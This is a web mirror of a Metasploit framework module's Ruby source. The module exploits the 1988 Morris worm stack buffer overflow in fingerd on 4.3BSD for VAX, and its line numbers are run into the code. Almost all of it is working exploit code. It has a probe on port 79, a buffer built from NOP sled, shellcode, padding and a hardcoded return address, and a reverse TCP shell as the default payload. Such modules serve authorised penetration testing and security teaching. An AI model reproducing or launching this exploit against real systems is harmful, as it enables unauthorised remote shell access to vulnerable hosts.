CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/bsd/finger/morris_fingerd_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = NormalRanking89# This is so one-off that we define it here10ARCH_VAX = 'vax'1112include Msf::Exploit::Remote::Tcp13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(update_info(info,17'Name' => 'Morris Worm fingerd Stack Buffer Overflow',18'Description' => %q{19This module exploits a stack buffer overflow in fingerd on 4.3BSD.2021This vulnerability was exploited by the Morris worm in 1988-11-02.22Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.2324Currently, only bsd/vax/shell_reverse_tcp is supported.25},26'Author' => [27'Robert Tappan Morris', # Discovery? Exploit and worm for sure28'Cliff Stoll', # The Cuckoo's Egg epilogue and inspiration29'wvu' # Module, payload, and additional research30],31'References' => [32['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History33['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis34['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'], # Details35['URL', 'https://github.com/arialdomartini/morris-worm'], # Source36['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup37# And credit to the innumerable VAX ISA docs on the Web38],39'DisclosureDate' => '1988-11-02',40'License' => MSF_LICENSE,41'Platform' => 'bsd',42'Arch' => ARCH_VAX,43'Privileged' => false, # Depends on inetd.conf, usually "nobody"44'Targets' => [45# https://en.wikipedia.org/wiki/Source_Code_Control_System46['@(#)fingerd.c 5.1 (Berkeley) 6/6/85',47'Ret' => 0x7fffe9b0,48'Payload' => {49'Space' => 403,50'BadChars' => "\n",51'Encoder' => 'generic/none', # There is no spoon52'DisableNops' => true # Hardcoded NOPs53}54]55],56'DefaultTarget' => 0,57'DefaultOptions' => {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'}58))5960register_options([Opt::RPORT(79)])61end6263def check64token = rand_text_alphanumeric(8..42)6566connect67sock.put("#{token}\n")68res = sock.get_once6970return CheckCode::Unknown unless res7172if res.include?("Login name: #{token}")73return CheckCode::Detected74end7576CheckCode::Safe77rescue EOFError, Rex::ConnectionError => e78vprint_error(e.message)79CheckCode::Unknown80ensure81disconnect82end8384def exploit85# Start by generating our custom VAX shellcode86shellcode = payload.encoded8788# 0x01 is NOP in VAX-speak89nops = "\x01" * (target.payload_space - shellcode.length)9091# This pads past buffer corruption92padding = rand_text_alphanumeric(109)9394# This zeroes out part of the stack frame95frame = "\x00" * 169697# Finally, pack in our return address98ret = [target.ret].pack('V') # V is for VAX!99100# The newline is for gets(3)101sploit = nops + shellcode + padding + frame + ret + "\n"102103# Fire away104print_status('Connecting to fingerd')105connect106print_status("Sending #{sploit.length}-byte buffer")107sock.put(sploit)108# Hat tip @bcoles109rescue Rex::ConnectionError => e110fail_with(Failure::Unreachable, e.message)111ensure112disconnect113end114115end116117118